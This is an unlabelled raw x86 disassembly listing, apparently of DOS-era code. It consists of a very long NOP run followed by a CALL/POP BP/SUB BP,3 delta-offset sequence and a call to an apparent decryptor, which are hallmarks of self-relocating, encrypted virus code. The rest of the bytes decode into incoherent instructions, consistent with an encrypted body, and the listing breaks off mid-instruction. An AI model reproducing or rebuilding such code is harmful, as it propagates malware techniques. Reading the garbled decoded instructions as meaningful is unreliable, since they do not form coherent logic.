+03EA 90 NOP +03EB 90 NOP +03EC 90 NOP +03ED 90 NOP +03EE 90 NOP +03EF 90 NOP +03F0 90 NOP +03F1 90 NOP +03F2 90 NOP +03F3 90 NOP +03F4 90 NOP +03F5 90 NOP +03F6 90 NOP +03F7 90 NOP +03F8 90 NOP +03F9 90 NOP +03FA 90 NOP +03FB 90 NOP +03FC 90 NOP +03FD 90 NOP +03FE 90 NOP +03FF 90 NOP +0400 90 NOP +0401 90 NOP +0402 90 NOP +0403 90 NOP +0404 90 NOP +0405 90 NOP +0406 90 NOP +0407 90 NOP +0408 90 NOP +0409 90 NOP +040A 90 NOP +040B 90 NOP +040C 90 NOP +040D 90 NOP +040E 90 NOP +040F 90 NOP +0410 90 NOP +0411 90 NOP +0412 90 NOP +0413 90 NOP +0414 90 NOP +0415 90 NOP +0416 90 NOP +0417 90 NOP +0418 90 NOP +0419 90 NOP +041A 90 NOP +041B 90 NOP +041C 90 NOP +041D 90 NOP +041E 90 NOP +041F 90 NOP +0420 90 NOP +0421 90 NOP +0422 90 NOP +0423 90 NOP +0424 90 NOP +0425 90 NOP +0426 90 NOP +0427 90 NOP +0428 90 NOP +0429 90 NOP +042A 90 NOP +042B 90 NOP +042C 90 NOP +042D 90 NOP +042E 90 NOP +042F 90 NOP +0430 90 NOP +0431 90 NOP +0432 90 NOP +0433 90 NOP +0434 90 NOP +0435 90 NOP +0436 90 NOP +0437 90 NOP +0438 90 NOP +0439 90 NOP +043A 90 NOP +043B 90 NOP +043C 90 NOP +043D 90 NOP +043E 90 NOP +043F 90 NOP +0440 90 NOP +0441 90 NOP +0442 90 NOP +0443 90 NOP +0444 90 NOP +0445 90 NOP +0446 90 NOP +0447 90 NOP +0448 90 NOP +0449 90 NOP +044A 90 NOP +044B 90 NOP +044C 90 NOP +044D 90 NOP +044E 90 NOP +044F 90 NOP +0450 90 NOP +0451 90 NOP +0452 90 NOP +0453 90 NOP +0454 90 NOP +0455 90 NOP +0456 90 NOP +0457 90 NOP +0458 90 NOP +0459 90 NOP +045A 90 NOP +045B 90 NOP +045C 90 NOP +045D 90 NOP +045E 90 NOP +045F 90 NOP +0460 90 NOP +0461 90 NOP +0462 90 NOP +0463 90 NOP +0464 90 NOP +0465 90 NOP +0466 90 NOP +0467 90 NOP +0468 90 NOP +0469 90 NOP +046A 90 NOP +046B 90 NOP +046C 90 NOP +046D 90 NOP +046E 90 NOP +046F 90 NOP +0470 90 NOP +0471 90 NOP +0472 90 NOP +0473 90 NOP +0474 90 NOP +0475 90 NOP +0476 90 NOP +0477 90 NOP +0478 90 NOP +0479 90 NOP +047A 90 NOP +047B 90 NOP +047C 90 NOP +047D 90 NOP +047E 90 NOP +047F 90 NOP +0480 90 NOP +0481 90 NOP +0482 90 NOP +0483 90 NOP +0484 90 NOP +0485 90 NOP +0486 90 NOP +0487 90 NOP +0488 90 NOP +0489 90 NOP +048A 90 NOP +048B 90 NOP +048C 90 NOP +048D 90 NOP +048E 90 NOP +048F 90 NOP +0490 90 NOP +0491 90 NOP +0492 90 NOP +0493 90 NOP +0494 90 NOP +0495 90 NOP +0496 90 NOP +0497 90 NOP +0498 90 NOP +0499 90 NOP +049A 90 NOP +049B 90 NOP +049C 90 NOP +049D 90 NOP +049E 90 NOP +049F 90 NOP +04A0 90 NOP +04A1 90 NOP +04A2 90 NOP +04A3 90 NOP +04A4 90 NOP +04A5 90 NOP +04A6 90 NOP +04A7 90 NOP +04A8 90 NOP +04A9 90 NOP +04AA 90 NOP +04AB 90 NOP +04AC 90 NOP +04AD 90 NOP +04AE 90 NOP +04AF 90 NOP +04B0 90 NOP +04B1 90 NOP +04B2 90 NOP +04B3 90 NOP +04B4 90 NOP +04B5 90 NOP +04B6 90 NOP +04B7 90 NOP +04B8 90 NOP +04B9 90 NOP +04BA 90 NOP +04BB 90 NOP +04BC 90 NOP +04BD 90 NOP +04BE 90 NOP +04BF 90 NOP +04C0 90 NOP +04C1 90 NOP +04C2 90 NOP +04C3 90 NOP +04C4 90 NOP +04C5 90 NOP +04C6 90 NOP +04C7 90 NOP +04C8 90 NOP +04C9 90 NOP +04CA 90 NOP +04CB 90 NOP +04CC 90 NOP +04CD 90 NOP +04CE 90 NOP +04CF 90 NOP +04D0 90 NOP +04D1 90 NOP +04D2 90 NOP +04D3 90 NOP +04D4 90 NOP +04D5 90 NOP +04D6 90 NOP +04D7 90 NOP +04D8 90 NOP +04D9 90 NOP +04DA 90 NOP +04DB 90 NOP +04DC 90 NOP +04DD 90 NOP +04DE 90 NOP +04DF 90 NOP +04E0 90 NOP +04E1 90 NOP +04E2 90 NOP +04E3 90 NOP +04E4 90 NOP +04E5 90 NOP +04E6 90 NOP +04E7 90 NOP +04E8 90 NOP +04E9 90 NOP +04EA 90 NOP +04EB 90 NOP +04EC 90 NOP +04ED 90 NOP +04EE 90 NOP +04EF 90 NOP +04F0 90 NOP +04F1 90 NOP +04F2 90 NOP +04F3 90 NOP +04F4 90 NOP +04F5 90 NOP +04F6 90 NOP +04F7 90 NOP +04F8 90 NOP +04F9 90 NOP +04FA 90 NOP +04FB 90 NOP +04FC 90 NOP +04FD 90 NOP +04FE 90 NOP +04FF 90 NOP +0500 90 NOP +0501 90 NOP +0502 90 NOP +0503 90 NOP +0504 90 NOP +0505 90 NOP +0506 90 NOP +0507 90 NOP +0508 90 NOP +0509 90 NOP +050A 90 NOP +050B 90 NOP +050C 90 NOP +050D 90 NOP +050E 90 NOP +050F 90 NOP +0510 90 NOP +0511 90 NOP +0512 90 NOP +0513 90 NOP +0514 90 NOP +0515 90 NOP +0516 90 NOP +0517 90 NOP +0518 90 NOP +0519 90 NOP +051A 90 NOP +051B 90 NOP +051C 90 NOP +051D 90 NOP +051E 90 NOP +051F 90 NOP +0520 90 NOP +0521 90 NOP +0522 90 NOP +0523 90 NOP +0524 90 NOP +0525 90 NOP +0526 90 NOP +0527 90 NOP +0528 90 NOP +0529 90 NOP +052A 90 NOP +052B 90 NOP +052C 90 NOP +052D 90 NOP +052E 90 NOP +052F 90 NOP +0530 90 NOP +0531 90 NOP +0532 90 NOP +0533 90 NOP +0534 90 NOP +0535 90 NOP +0536 90 NOP +0537 90 NOP +0538 90 NOP +0539 90 NOP +053A 90 NOP +053B 90 NOP +053C 90 NOP +053D 90 NOP +053E 90 NOP +053F 90 NOP +0540 90 NOP +0541 90 NOP +0542 90 NOP +0543 90 NOP +0544 90 NOP +0545 90 NOP +0546 90 NOP +0547 90 NOP +0548 90 NOP +0549 90 NOP +054A 90 NOP +054B 90 NOP +054C 90 NOP +054D 90 NOP +054E 90 NOP +054F 90 NOP +0550 90 NOP +0551 90 NOP +0552 90 NOP +0553 90 NOP +0554 90 NOP +0555 90 NOP +0556 90 NOP +0557 90 NOP +0558 90 NOP +0559 90 NOP +055A 90 NOP +055B 90 NOP +055C 90 NOP +055D 90 NOP +055E 90 NOP +055F 90 NOP +0560 90 NOP +0561 90 NOP +0562 90 NOP +0563 90 NOP +0564 90 NOP +0565 90 NOP +0566 90 NOP +0567 90 NOP +0568 90 NOP +0569 90 NOP +056A 90 NOP +056B 90 NOP +056C 90 NOP +056D 90 NOP +056E 90 NOP +056F 90 NOP +0570 90 NOP +0571 90 NOP +0572 90 NOP +0573 90 NOP +0574 90 NOP +0575 90 NOP +0576 90 NOP +0577 90 NOP +0578 90 NOP +0579 90 NOP +057A 90 NOP +057B 90 NOP +057C 90 NOP +057D 90 NOP +057E 90 NOP +057F 90 NOP +0580 90 NOP +0581 90 NOP +0582 90 NOP +0583 90 NOP +0584 90 NOP +0585 90 NOP +0586 90 NOP +0587 90 NOP +0588 90 NOP +0589 90 NOP +058A 90 NOP +058B 90 NOP +058C 90 NOP +058D 90 NOP +058E 90 NOP +058F 90 NOP +0590 90 NOP +0591 90 NOP +0592 90 NOP +0593 90 NOP +0594 90 NOP +0595 90 NOP +0596 90 NOP +0597 90 NOP +0598 90 NOP +0599 90 NOP +059A 90 NOP +059B 90 NOP +059C 90 NOP +059D 90 NOP +059E 90 NOP +059F 90 NOP +05A0 90 NOP +05A1 90 NOP +05A2 90 NOP +05A3 90 NOP +05A4 90 NOP +05A5 90 NOP +05A6 90 NOP +05A7 90 NOP +05A8 90 NOP +05A9 90 NOP +05AA 90 NOP +05AB 90 NOP +05AC 90 NOP +05AD 90 NOP +05AE 90 NOP +05AF 90 NOP +05B0 90 NOP +05B1 90 NOP +05B2 90 NOP +05B3 90 NOP +05B4 90 NOP +05B5 90 NOP +05B6 90 NOP +05B7 90 NOP +05B8 90 NOP +05B9 90 NOP +05BA 90 NOP +05BB 90 NOP +05BC 90 NOP +05BD 90 NOP +05BE 90 NOP +05BF 90 NOP +05C0 90 NOP +05C1 90 NOP +05C2 90 NOP +05C3 90 NOP +05C4 90 NOP +05C5 90 NOP +05C6 90 NOP +05C7 90 NOP +05C8 90 NOP +05C9 90 NOP +05CA 90 NOP +05CB 90 NOP +05CC 90 NOP +05CD 90 NOP +05CE 90 NOP +05CF 90 NOP +05D0 90 NOP +05D1 90 NOP +05D2 90 NOP +05D3 90 NOP +05D4 90 NOP +05D5 90 NOP +05D6 90 NOP +05D7 90 NOP +05D8 90 NOP +05D9 90 NOP +05DA 90 NOP +05DB 90 NOP +05DC 90 NOP +05DD 90 NOP +05DE 90 NOP +05DF 90 NOP +05E0 90 NOP +05E1 90 NOP +05E2 90 NOP +05E3 90 NOP +05E4 90 NOP +05E5 90 NOP +05E6 90 NOP +05E7 90 NOP +05E8 90 NOP +05E9 90 NOP +05EA 90 NOP +05EB 90 NOP +05EC 90 NOP +05ED 90 NOP +05EE 90 NOP +05EF 90 NOP +05F0 90 NOP +05F1 90 NOP +05F2 90 NOP +05F3 90 NOP +05F4 90 NOP +05F5 90 NOP +05F6 90 NOP +05F7 90 NOP +05F8 90 NOP +05F9 90 NOP +05FA 90 NOP +05FB 90 NOP +05FC 90 NOP +05FD 90 NOP +05FE 90 NOP +05FF 90 NOP +0600 90 NOP +0601 90 NOP +0602 90 NOP +0603 90 NOP +0604 90 NOP +0605 90 NOP +0606 90 NOP +0607 90 NOP +0608 90 NOP +0609 90 NOP +060A 90 NOP +060B 90 NOP +060C 90 NOP +060D 90 NOP +060E 90 NOP +060F 90 NOP +0610 90 NOP +0611 90 NOP +0612 90 NOP +0613 90 NOP +0614 90 NOP +0615 90 NOP +0616 90 NOP +0617 90 NOP +0618 90 NOP +0619 90 NOP +061A 90 NOP +061B 90 NOP +061C 90 NOP +061D 90 NOP +061E 90 NOP +061F 90 NOP +0620 90 NOP +0621 90 NOP +0622 90 NOP +0623 90 NOP +0624 90 NOP +0625 90 NOP +0626 90 NOP +0627 90 NOP +0628 90 NOP +0629 90 NOP +062A 90 NOP +062B 90 NOP +062C 90 NOP +062D 90 NOP +062E 90 NOP +062F 90 NOP +0630 90 NOP +0631 90 NOP +0632 90 NOP +0633 90 NOP +0634 90 NOP +0635 90 NOP +0636 90 NOP +0637 90 NOP +0638 90 NOP +0639 90 NOP +063A 90 NOP +063B 90 NOP +063C 90 NOP +063D 90 NOP +063E 90 NOP +063F 90 NOP +0640 90 NOP +0641 90 NOP +0642 90 NOP +0643 90 NOP +0644 90 NOP +0645 90 NOP +0646 90 NOP +0647 90 NOP +0648 90 NOP +0649 90 NOP +064A 90 NOP +064B 90 NOP +064C 90 NOP +064D 90 NOP +064E 90 NOP +064F 90 NOP +0650 90 NOP +0651 90 NOP +0652 90 NOP +0653 90 NOP +0654 90 NOP +0655 90 NOP +0656 90 NOP +0657 90 NOP +0658 90 NOP +0659 90 NOP +065A 90 NOP +065B 90 NOP +065C 90 NOP +065D 90 NOP +065E 90 NOP +065F 90 NOP +0660 90 NOP +0661 90 NOP +0662 90 NOP +0663 90 NOP +0664 90 NOP +0665 90 NOP +0666 90 NOP +0667 90 NOP +0668 90 NOP +0669 90 NOP +066A 90 NOP +066B 90 NOP +066C 90 NOP +066D 90 NOP +066E 90 NOP +066F 90 NOP +0670 90 NOP +0671 90 NOP +0672 90 NOP +0673 90 NOP +0674 90 NOP +0675 90 NOP +0676 90 NOP +0677 90 NOP +0678 90 NOP +0679 90 NOP +067A 90 NOP +067B 90 NOP +067C 90 NOP +067D 90 NOP +067E 90 NOP +067F 90 NOP +0680 90 NOP +0681 90 NOP +0682 90 NOP +0683 90 NOP +0684 90 NOP +0685 90 NOP +0686 90 NOP +0687 90 NOP +0688 90 NOP +0689 90 NOP +068A 90 NOP +068B 90 NOP +068C 90 NOP +068D 90 NOP +068E 90 NOP +068F 90 NOP +0690 90 NOP +0691 90 NOP +0692 90 NOP +0693 90 NOP +0694 90 NOP +0695 90 NOP +0696 90 NOP +0697 90 NOP +0698 90 NOP +0699 90 NOP +069A 90 NOP +069B 90 NOP +069C 90 NOP +069D 90 NOP +069E 90 NOP +069F 90 NOP +06A0 90 NOP +06A1 90 NOP +06A2 90 NOP +06A3 90 NOP +06A4 90 NOP +06A5 90 NOP +06A6 90 NOP +06A7 90 NOP +06A8 90 NOP +06A9 90 NOP +06AA 90 NOP +06AB 90 NOP +06AC 90 NOP +06AD 90 NOP +06AE 90 NOP +06AF 90 NOP +06B0 90 NOP +06B1 90 NOP +06B2 90 NOP +06B3 90 NOP +06B4 90 NOP +06B5 90 NOP +06B6 90 NOP +06B7 90 NOP +06B8 90 NOP +06B9 90 NOP +06BA 90 NOP +06BB 90 NOP +06BC 90 NOP +06BD 90 NOP +06BE 90 NOP +06BF 90 NOP +06C0 90 NOP +06C1 90 NOP +06C2 90 NOP +06C3 90 NOP +06C4 90 NOP +06C5 90 NOP +06C6 90 NOP +06C7 90 NOP +06C8 90 NOP +06C9 90 NOP +06CA 90 NOP +06CB 90 NOP +06CC 90 NOP +06CD 90 NOP +06CE 90 NOP +06CF 90 NOP +06D0 90 NOP +06D1 90 NOP +06D2 90 NOP +06D3 90 NOP +06D4 90 NOP +06D5 90 NOP +06D6 90 NOP +06D7 90 NOP +06D8 90 NOP +06D9 90 NOP +06DA 90 NOP +06DB 90 NOP +06DC 90 NOP +06DD 90 NOP +06DE 90 NOP +06DF 90 NOP +06E0 90 NOP +06E1 90 NOP +06E2 90 NOP +06E3 90 NOP +06E4 90 NOP +06E5 90 NOP +06E6 90 NOP +06E7 90 NOP +06E8 90 NOP +06E9 90 NOP +06EA 90 NOP +06EB 90 NOP +06EC 90 NOP +06ED 90 NOP +06EE 90 NOP +06EF 90 NOP +06F0 90 NOP +06F1 90 NOP +06F2 90 NOP +06F3 90 NOP +06F4 90 NOP +06F5 90 NOP +06F6 90 NOP +06F7 90 NOP +06F8 90 NOP +06F9 90 NOP +06FA 90 NOP +06FB 90 NOP +06FC 90 NOP +06FD 90 NOP +06FE 90 NOP +06FF 90 NOP +0700 90 NOP +0701 90 NOP +0702 90 NOP +0703 90 NOP +0704 90 NOP +0705 90 NOP +0706 90 NOP +0707 90 NOP +0708 90 NOP +0709 90 NOP +070A 90 NOP +070B 90 NOP +070C 90 NOP +070D 90 NOP +070E 90 NOP +070F 90 NOP +0710 90 NOP +0711 90 NOP +0712 90 NOP +0713 90 NOP +0714 90 NOP +0715 90 NOP +0716 90 NOP +0717 90 NOP +0718 90 NOP +0719 90 NOP +071A 90 NOP +071B 90 NOP +071C 90 NOP +071D 90 NOP +071E 90 NOP +071F 90 NOP +0720 90 NOP +0721 90 NOP +0722 90 NOP +0723 90 NOP +0724 90 NOP +0725 90 NOP +0726 90 NOP +0727 90 NOP +0728 90 NOP +0729 90 NOP +072A 90 NOP +072B 90 NOP +072C 90 NOP +072D 90 NOP +072E 90 NOP +072F 90 NOP +0730 90 NOP +0731 90 NOP +0732 90 NOP +0733 90 NOP +0734 90 NOP +0735 90 NOP +0736 90 NOP +0737 90 NOP +0738 90 NOP +0739 90 NOP +073A 90 NOP +073B 90 NOP +073C 90 NOP +073D 90 NOP +073E 90 NOP +073F 90 NOP +0740 90 NOP +0741 90 NOP +0742 90 NOP +0743 90 NOP +0744 90 NOP +0745 90 NOP +0746 90 NOP +0747 90 NOP +0748 90 NOP +0749 90 NOP +074A 90 NOP +074B 90 NOP +074C 90 NOP +074D 90 NOP +074E 90 NOP +074F 90 NOP +0750 90 NOP +0751 90 NOP +0752 90 NOP +0753 90 NOP +0754 90 NOP +0755 90 NOP +0756 90 NOP +0757 90 NOP +0758 90 NOP +0759 90 NOP +075A 90 NOP +075B 90 NOP +075C 90 NOP +075D 90 NOP +075E 90 NOP +075F 90 NOP +0760 90 NOP +0761 90 NOP +0762 90 NOP +0763 90 NOP +0764 90 NOP +0765 90 NOP +0766 90 NOP +0767 90 NOP +0768 90 NOP +0769 90 NOP +076A 90 NOP +076B 90 NOP +076C 90 NOP +076D 90 NOP +076E 90 NOP +076F 90 NOP +0770 90 NOP +0771 90 NOP +0772 90 NOP +0773 90 NOP +0774 90 NOP +0775 90 NOP +0776 90 NOP +0777 90 NOP +0778 90 NOP +0779 90 NOP +077A 90 NOP +077B 90 NOP +077C 90 NOP +077D 90 NOP +077E 90 NOP +077F 90 NOP +0780 90 NOP +0781 90 NOP +0782 90 NOP +0783 90 NOP +0784 90 NOP +0785 90 NOP +0786 90 NOP +0787 90 NOP +0788 90 NOP +0789 90 NOP +078A 90 NOP +078B 90 NOP +078C 90 NOP +078D 90 NOP +078E 90 NOP +078F 90 NOP +0790 90 NOP +0791 90 NOP +0792 90 NOP +0793 90 NOP +0794 90 NOP +0795 90 NOP +0796 90 NOP +0797 90 NOP +0798 90 NOP +0799 90 NOP +079A 90 NOP +079B 90 NOP +079C 90 NOP +079D 90 NOP +079E 90 NOP +079F 90 NOP +07A0 90 NOP +07A1 90 NOP +07A2 90 NOP +07A3 90 NOP +07A4 90 NOP +07A5 90 NOP +07A6 90 NOP +07A7 90 NOP +07A8 90 NOP +07A9 90 NOP +07AA 90 NOP +07AB 90 NOP +07AC 90 NOP +07AD 90 NOP +07AE 90 NOP +07AF 90 NOP +07B0 90 NOP +07B1 90 NOP +07B2 90 NOP +07B3 90 NOP +07B4 90 NOP +07B5 90 NOP +07B6 90 NOP +07B7 90 NOP +07B8 90 NOP +07B9 90 NOP +07BA 90 NOP +07BB 90 NOP +07BC 90 NOP +07BD 90 NOP +07BE 90 NOP +07BF 90 NOP +07C0 90 NOP +07C1 90 NOP +07C2 90 NOP +07C3 90 NOP +07C4 90 NOP +07C5 90 NOP +07C6 90 NOP +07C7 90 NOP +07C8 90 NOP +07C9 90 NOP +07CA 90 NOP +07CB 90 NOP +07CC 90 NOP +07CD 90 NOP +07CE 90 NOP +07CF 90 NOP +07D0 90 NOP +07D1 90 NOP +07D2 90 NOP +07D3 90 NOP +07D4 90 NOP +07D5 90 NOP +07D6 90 NOP +07D7 90 NOP +07D8 90 NOP +07D9 90 NOP +07DA 90 NOP +07DB 90 NOP +07DC 90 NOP +07DD 90 NOP +07DE 90 NOP +07DF 90 NOP +07E0 90 NOP +07E1 90 NOP +07E2 90 NOP +07E3 90 NOP +07E4 90 NOP +07E5 90 NOP +07E6 90 NOP +07E7 90 NOP +07E8 90 NOP +07E9 90 NOP +07EA 90 NOP +07EB 90 NOP +07EC 90 NOP +07ED 90 NOP +07EE 90 NOP +07EF 90 NOP +07F0 90 NOP +07F1 90 NOP +07F2 90 NOP +07F3 90 NOP +07F4 90 NOP +07F5 90 NOP +07F6 90 NOP +07F7 90 NOP +07F8 90 NOP +07F9 90 NOP +07FA 90 NOP +07FB 90 NOP +07FC 90 NOP +07FD 90 NOP +07FE 90 NOP +07FF 90 NOP +0800 90 NOP +0801 90 NOP +0802 90 NOP +0803 90 NOP +0804 90 NOP +0805 90 NOP +0806 90 NOP +0807 90 NOP +0808 90 NOP +0809 90 NOP +080A 90 NOP +080B 90 NOP +080C 90 NOP +080D 90 NOP +080E 90 NOP +080F 90 NOP +0810 90 NOP +0811 90 NOP +0812 90 NOP +0813 90 NOP +0814 90 NOP +0815 90 NOP +0816 90 NOP +0817 90 NOP +0818 90 NOP +0819 90 NOP +081A 90 NOP +081B 90 NOP +081C 90 NOP +081D 90 NOP +081E 90 NOP +081F 90 NOP +0820 90 NOP +0821 90 NOP +0822 90 NOP +0823 90 NOP +0824 90 NOP +0825 90 NOP +0826 90 NOP +0827 90 NOP +0828 90 NOP +0829 90 NOP +082A 90 NOP +082B 90 NOP +082C 90 NOP +082D 90 NOP +082E 90 NOP +082F 90 NOP +0830 90 NOP +0831 90 NOP +0832 90 NOP +0833 90 NOP +0834 90 NOP +0835 90 NOP +0836 90 NOP +0837 90 NOP +0838 90 NOP +0839 90 NOP +083A 90 NOP +083B 90 NOP +083C 90 NOP +083D 90 NOP +083E 90 NOP +083F 90 NOP +0840 90 NOP +0841 90 NOP +0842 90 NOP +0843 90 NOP +0844 90 NOP +0845 90 NOP +0846 90 NOP +0847 90 NOP +0848 90 NOP +0849 90 NOP +084A 90 NOP +084B 90 NOP +084C 90 NOP +084D 90 NOP +084E 90 NOP +084F 90 NOP +0850 90 NOP +0851 90 NOP +0852 90 NOP +0853 90 NOP +0854 90 NOP +0855 90 NOP +0856 90 NOP +0857 90 NOP +0858 90 NOP +0859 90 NOP +085A 90 NOP +085B 90 NOP +085C 90 NOP +085D 90 NOP +085E 90 NOP +085F 90 NOP +0860 90 NOP +0861 90 NOP +0862 90 NOP +0863 90 NOP +0864 90 NOP +0865 90 NOP +0866 90 NOP +0867 90 NOP +0868 90 NOP +0869 90 NOP +086A 90 NOP +086B 90 NOP +086C 90 NOP +086D 90 NOP +086E 90 NOP +086F 90 NOP +0870 90 NOP +0871 90 NOP +0872 90 NOP +0873 90 NOP +0874 90 NOP +0875 90 NOP +0876 90 NOP +0877 90 NOP +0878 90 NOP +0879 90 NOP +087A 90 NOP +087B 90 NOP +087C 90 NOP +087D 90 NOP +087E 90 NOP +087F 90 NOP +0880 90 NOP +0881 90 NOP +0882 90 NOP +0883 90 NOP +0884 90 NOP +0885 90 NOP +0886 90 NOP +0887 90 NOP +0888 90 NOP +0889 90 NOP +088A 90 NOP +088B 90 NOP +088C 90 NOP +088D 90 NOP +088E 90 NOP +088F 90 NOP +0890 90 NOP +0891 90 NOP +0892 90 NOP +0893 90 NOP +0894 90 NOP +0895 90 NOP +0896 90 NOP +0897 90 NOP +0898 90 NOP +0899 90 NOP +089A 90 NOP +089B 90 NOP +089C 90 NOP +089D 90 NOP +089E 90 NOP +089F 90 NOP +08A0 90 NOP +08A1 90 NOP +08A2 90 NOP +08A3 90 NOP +08A4 90 NOP +08A5 90 NOP +08A6 90 NOP +08A7 90 NOP +08A8 90 NOP +08A9 90 NOP +08AA 90 NOP +08AB 90 NOP +08AC 90 NOP +08AD 90 NOP +08AE 90 NOP +08AF 90 NOP +08B0 90 NOP +08B1 90 NOP +08B2 90 NOP +08B3 90 NOP +08B4 90 NOP +08B5 90 NOP +08B6 90 NOP +08B7 90 NOP +08B8 90 NOP +08B9 90 NOP +08BA 90 NOP +08BB 90 NOP +08BC 90 NOP +08BD 90 NOP +08BE 90 NOP +08BF 90 NOP +08C0 90 NOP +08C1 90 NOP +08C2 90 NOP +08C3 90 NOP +08C4 90 NOP +08C5 90 NOP +08C6 90 NOP +08C7 90 NOP +08C8 90 NOP +08C9 90 NOP +08CA 90 NOP +08CB 90 NOP +08CC 90 NOP +08CD 90 NOP +08CE 90 NOP +08CF 90 NOP +08D0 90 NOP +08D1 90 NOP +08D2 90 NOP +08D3 90 NOP +08D4 90 NOP +08D5 90 NOP +08D6 90 NOP +08D7 90 NOP +08D8 90 NOP +08D9 90 NOP +08DA 90 NOP +08DB 90 NOP +08DC 90 NOP +08DD 90 NOP +08DE 90 NOP +08DF 90 NOP +08E0 90 NOP +08E1 90 NOP +08E2 90 NOP +08E3 90 NOP +08E4 90 NOP +08E5 90 NOP +08E6 90 NOP +08E7 90 NOP +08E8 90 NOP +08E9 90 NOP +08EA 90 NOP +08EB 90 NOP +08EC 90 NOP +08ED 90 NOP +08EE 90 NOP +08EF E8 00 00 CALL 08F2 +08F2 5D POP BP +08F3 81 ED 03 00 SUB BP,3 +08F7 E8 3F 04 CALL 0D39 +08FA 0F F5 DB 0F,0F5 +08FC F6 7A 96 IDIV B[BP+SI-06A] +08FF 8A 86 94 C3 MOV AL,B[BP+0C394] +0903 82 DB 082 +0904 A9 B1 B9 TEST AX,0B9B1 +0907 A8 B9 TEST AL,0B9 +0909 B0 3B MOV AL,03B +090B 77 FF JA 090C +090D 39 6F 36 CMP W[BX+036],BP +0910 99 CWD +0911 B4 B7 MOV AH,0B7 +0913 38 B7 36 99 CMP B[BX+09936],DH +0917 A5 MOVSW +0918 B7 38 MOV BH,038 +091A B7 16 MOV BH,016 +091C A5 MOVSW +091D B7 39 MOV BH,039 +091F 6F OUTSW +0920 F7 39 IDIV W[BX+DI] +0922 77 71 JA 0995 +0924 B1 B7 MOV CL,0B7 +0926 B7 ED MOV BH,0ED +0928 70 B1 JO 08DB +092A B6 B7 MOV DH,0B7 +092C BF B7 70 MOV DI,070B7 +092F B1 B4 MOV CL,0B4 +0931 B7 39 MOV BH,039 +0933 B7 B9 MOV BH,0B9 +0935 A8 5C TEST AL,05C +0937 B3 27 MOV BL,027 +0939 5C POP SP +093A EC IN AL,DX +093B 27 DAA +093C 84 48 0E TEST B[BX+SI+0E],CL +093F 87 B5 3C 42 XCHG W[DI+0423C],SI +0943 44 INC SP +0944 12 84 77 39 ADC AL,B[SI+03977] +0948 6F OUTSW +0949 A9 72 B1 TEST AX,0B172 +094C 33 B7 91 14 XOR SI,W[BX+01491] +0950 46 INC SI +0951 B6 91 MOV DH,091 +0953 3B A9 44 B6 CMP BP,W[BX+DI+0B644] +0957 A8 A9 TEST AL,0A9 +0959 72 B1 JB 090C +095B 97 XCHG AX,DI +095C B7 91 MOV BH,091 +095E 14 69 ADC AL,069 +0960 B6 91 MOV DH,091 +0962 3B A9 57 B6 CMP BP,W[BX+DI+0B657] +0966 A8 A9 TEST AL,0A9 +0968 72 B1 JB 091B +096A 93 XCHG AX,BX +096B B7 91 MOV BH,091 +096D 14 BF ADC AL,0BF +096F B6 91 MOV DH,091 +0971 3B A9 BD B6 CMP BP,W[BX+DI+0B6BD] +0975 A8 70 TEST AL,070 +0977 B1 33 MOV CL,033 +0979 B7 55 MOV BH,055 +097B B6 3B MOV DH,03B +097D B1 31 MOV CL,031 +097F B7 70 MOV BH,070 +0981 B1 97 MOV CL,097 +0983 B7 E4 MOV BH,0E4 +0985 B6 3B MOV DH,03B +0987 B1 95 MOV CL,095 +0989 B7 70 MOV BH,070 +098B B1 93 MOV CL,093 +098D B7 48 MOV BH,048 +098F B7 3B MOV BH,03B +0991 B1 91 MOV CL,091 +0993 B7 B0 MOV BH,0B0 +0995 A8 36 TEST AL,036 +0997 4B DEC BX +0998 F5 CMC +0999 F6 C3 B9 TEST BL,0B9 +099C 3A 01 CMP AL,B[BX+DI] +099E 82 DB 082 +099F B4 08 MOV AH,8 +09A1 B7 B6 MOV BH,0B6 +09A3 E0 13 LOOPNE 09B8 +09A5 12 12 ADC DL,B[BP+SI] +09A7 5C POP SP +09A8 A4 MOVSB +09A9 27 DAA +09AA A9 B1 B9 TEST AX,0B9B1 +09AD A8 B9 TEST AL,0B9 +09AF B0 3A MOV AL,03A +09B1 01 40 B7 ADD W[BX+SI-049],AX +09B4 3A 09 CMP CL,B[BX+DI] +09B6 58 POP AX +09B7 B7 12 MOV BH,012 +09B9 12 12 ADC DL,B[BP+SI] +09BB 12 36 4B 89 ADC DH,B[0894B] +09BF F6 C3 B6 TEST BL,0B6 +09C2 74 B0 JE 0974 +09C4 A8 3B TEST AL,03B +09C6 77 B2 JA 097A +09C8 A7 CMPSW +09C9 B7 99 MOV BH,099 +09CB B6 31 MOV DH,031 +09CD 46 INC SI +09CE B7 99 MOV BH,099 +09D0 B4 31 MOV AH,031 +09D2 42 INC DX +09D3 B7 4D MOV BH,04D +09D5 99 CWD +09D6 3C 11 CMP AL,011 +09D8 44 INC SP +09D9 B7 39 MOV BH,039 +09DB 67 DB 067 +09DC 4C DEC SP +09DD 5D POP BP +09DE B7 B7 MOV BH,0B7 +09E0 B7 B7 MOV BH,0B7 +09E2 B7 B7 MOV BH,0B7 +09E4 B7 B7 MOV BH,0B7 +09E6 B7 B7 MOV BH,0B7 +09E8 47 INC DI +09E9 48 DEC AX +09EA B7 B7 MOV BH,0B7 +09EC B7 B7 MOV BH,0B7 +09EE E7 53 OUT 053,AX +09F0 D7 XLATB +09F1 8B E4 MOV SP,SP +09F3 C3 RET +09F4 B1 EF MOV CL,0EF +09F6 5D POP BP +09F7 30 5E B7 XOR B[BP-049],BL +09FA 47 INC DI +09FB E7 E4 OUT 0E4,AX +09FD E6 E5 OUT 0E5,AL +09FF A9 B1 84 TEST AX,084B1 +0A02 77 7A JA 0A7E +0A04 AD LODSW +0A05 34 4E XOR AL,04E +0A07 BE C5 9B MOV SI,09BC5 +0A0A 34 4E XOR AL,04E +0A0C B8 C0 90 MOV AX,090C0 +0A0F B9 A8 B9 MOV CX,0B9A8 +0A12 B0 84 MOV AL,084 +0A14 77 07 JA 0A1D +0A16 B4 7A MOV AH,07A +0A18 A7 CMPSW +0A19 03 BE 0D E6 ADD DI,W[BP+0E60D] +0A1D B4 7A MOV AH,07A +0A1F 96 XCHG AX,SI +0A20 0E PUSH CS +0A21 B2 B7 MOV DL,0B7 +0A23 E6 03 OUT 3,AL +0A25 B7 7A MOV BH,07A +0A27 AD LODSW +0A28 34 75 XOR AL,075 +0A2A A5 MOVSW +0A2B 3C 6D CMP AL,06D +0A2D 7A AD JPE 09DC +0A2F 8C 64 C2 MOV W[SI-03E],ES +0A32 4D DEC BP +0A33 EE OUT DX,AL +0A34 55 PUSH BP +0A35 5A POP DX +0A36 B0 A8 MOV AL,0A8 +0A38 ED IN 